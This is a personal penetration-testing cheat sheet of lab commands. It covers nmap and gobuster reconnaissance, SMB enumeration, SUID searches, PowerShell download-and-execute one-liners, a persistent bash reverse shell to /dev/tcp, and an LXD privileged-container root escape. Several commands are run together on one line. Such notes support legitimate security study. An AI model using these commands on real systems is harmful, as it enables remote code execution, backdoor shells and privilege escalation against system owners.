Captured learning notes
wget --delete-after url 2>&1 | grep Location:
curl -v -L http://picasaweb.google.com 2>&1 | egrep "^> (Host:|GET)"nmap 10.10.10.150 -p-
nmap -sC -sV 10.10.150 -p80 -oA scandirhunt 10.10.10.150
gobuster -u 10.10.10.150 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtnmb lookup -A 10.10.10.150
smbclient -L \\fqdn -I 10.10.10.150 -Npython -c 'import pty;pty.spawn("/bin/bash")'export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbinLinux Privilege Escalation using SUID Binaries
find / -perm -u=s -type f 2>/dev/nullfind / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/nullFind files not owned by user
find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/nullFind files owned by user
find / -writable -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/nullFind hidden files
find / -name ".*" -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/nullIEX(New-Object Net.WebClient).downloadString('https://10.10.10.150:80/script.ps1')
powershell "(New-Object System.Net.WebClient).downloadFile('http://10.10.10.150:8000/file.exe','file.exe')"padbuster http://10.10.10.150 string # -cookies auth=string -encoding 0echo string | base64 --decodewhile true; do sleep 25 && bash -i >& /dev/tcp/10.10.2.58/6666 0>&1; done 2>/dev/null &openssl s_client -connect 10.10.10.150:995Download and build the image locally.
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine -a i686On victim server, import image, set perms and exec shell
lxc image import ./alpine-v3.12-i686-20200831_2152.tar.gz --alias myimage
lxc image list
lxc init myimage trevor -c security.privileged=true
lxc config device add trevor mydevice disk source=/ path=/mnt/root recursive=true
lxc start trevor
lxc exec trevor /bin/sh